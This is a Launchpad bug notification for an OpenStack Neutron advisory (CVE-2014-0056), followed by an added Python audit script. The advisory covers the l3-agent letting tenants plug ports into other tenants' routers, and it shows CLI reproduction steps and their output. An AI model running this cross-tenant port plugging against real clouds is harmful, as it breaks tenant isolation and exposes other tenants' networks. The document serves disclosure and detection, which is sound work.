** Changed in: neutron
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327
Title:
[OSSA 2014-008] Routers can be cross plugged by other tenants
(CVE-2014-0056)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron grizzly series:
In Progress
Status in neutron havana series:
Fix Committed
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The l3-agent does not check tenant_id and allows tenants to be able to
plug ports into others' routers if the device_id is set to another
tenant's router.
# become admin tenant
arosen@arosen-desktop:~/devstack$ source openrc admin admin
# Create router as admin:
arosen@arosen-desktop:~/devstack$ neutron router-create admin-router
Created a new router:
+-----------------------+--------------------------------------+
| Field                 | Value                                |
+-----------------------+--------------------------------------+
| admin_state_up        | True                                 |
| external_gateway_info |                                      |
| id                    | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
| name                  | admin-router                         |
| status                | ACTIVE                               |
| tenant_id             | 04e94acfe69f4960a69c6a78d39466c4     |
+-----------------------+--------------------------------------+
# Become demo tenant
arosen@arosen-desktop:~/devstack$ source openrc demo demo
# create port with correct device_id and device_owner
arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
Created a new port:
+-----------------------+---------------------------------------------------------------------------------+
| Field                 | Value                                                                           |
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up        | True                                                                            |
| allowed_address_pairs |                                                                                 |
| device_id             | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600                                            |
| device_owner          | network:router_interface                                                        |
| fixed_ips             | {"subnet_id": "5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
| id                    | 895cf428-4bfb-4c79-86c2-d40af9bf3587                                            |
| mac_address           | fa:16:3e:21:33:6c                                                               |
| name                  |                                                                                 |
| network_id            | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7                                            |
| security_groups       |                                                                                 |
| status                | DOWN                                                                            |
| tenant_id             | ad069ea620614cce9c4b6f088d39d03e                                                |
+-----------------------+---------------------------------------------------------------------------------+
Now when the l3-agent is restarted or enters its periodic sync state:
arosen@arosen-desktop:~/devstack$ sudo ip netns exec qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

qr-895cf428-4b Link encap:Ethernet  HWaddr fa:16:3e:21:33:6c
          inet addr:10.0.0.3  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:300 (300.0 B)  TX bytes:398 (398.0 B)
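As an added example (not Neutron's code and not the fix that shipped), the ownership check the report says is missing, written as an audit over a constructed port inventory that reuses the ids above; `ROUTER_IFACE`, `interface_port_allowed` and `find_cross_plugged` are hypothetical names.

```python
# Added example (not Neutron's code): audit router interface ports whose
# tenant differs from the tenant of the router they are plugged into.
from typing import Dict, List

ROUTER_IFACE = "network:router_interface"

# Constructed sample inventory, reusing the ids from the report above
# plus one legitimate and one dangling port made up for the example.
ROUTERS: Dict[str, Dict[str, str]] = {
    "80ffe19a-649c-4fc9-a0d9-2a3d67c5f600": {
        "name": "admin-router", "tenant_id": "04e94acfe69f4960a69c6a78d39466c4"},
}
PORTS: List[Dict[str, str]] = [
    {"id": "895cf428-4bfb-4c79-86c2-d40af9bf3587",      # demo tenant's port
     "device_id": "80ffe19a-649c-4fc9-a0d9-2a3d67c5f600",
     "device_owner": ROUTER_IFACE,
     "tenant_id": "ad069ea620614cce9c4b6f088d39d03e"},
    {"id": "00000000-0000-4000-8000-000000000001",      # owned by admin tenant
     "device_id": "80ffe19a-649c-4fc9-a0d9-2a3d67c5f600",
     "device_owner": ROUTER_IFACE,
     "tenant_id": "04e94acfe69f4960a69c6a78d39466c4"},
    {"id": "00000000-0000-4000-8000-000000000002",      # router does not exist
     "device_id": "00000000-0000-4000-8000-0000000000ff",
     "device_owner": ROUTER_IFACE,
     "tenant_id": "ad069ea620614cce9c4b6f088d39d03e"},
]


def interface_port_allowed(port: Dict[str, str], router: Dict[str, str]) -> bool:
    """Hypothetical check: a router interface port is acceptable only when
    its tenant_id matches the router's tenant_id; other ports pass."""
    if port["device_owner"] != ROUTER_IFACE:
        return True
    return port["tenant_id"] == router["tenant_id"]


def find_cross_plugged(ports, routers) -> List[Dict[str, str]]:
    """One finding per interface port with an unknown router or a tenant mismatch."""
    findings = []
    for port in ports:
        if port["device_owner"] != ROUTER_IFACE:
            continue
        router = routers.get(port["device_id"])
        if router is None:
            findings.append({"port_id": port["id"], "reason": "unknown-router"})
        elif not interface_port_allowed(port, router):
            findings.append({"port_id": port["id"], "reason": "cross-tenant",
                             "port_tenant": port["tenant_id"],
                             "router_tenant": router["tenant_id"]})
    return findings
```

Fed with the output of a port and router listing, the same walk flags every interface port an operator should review after applying the fix.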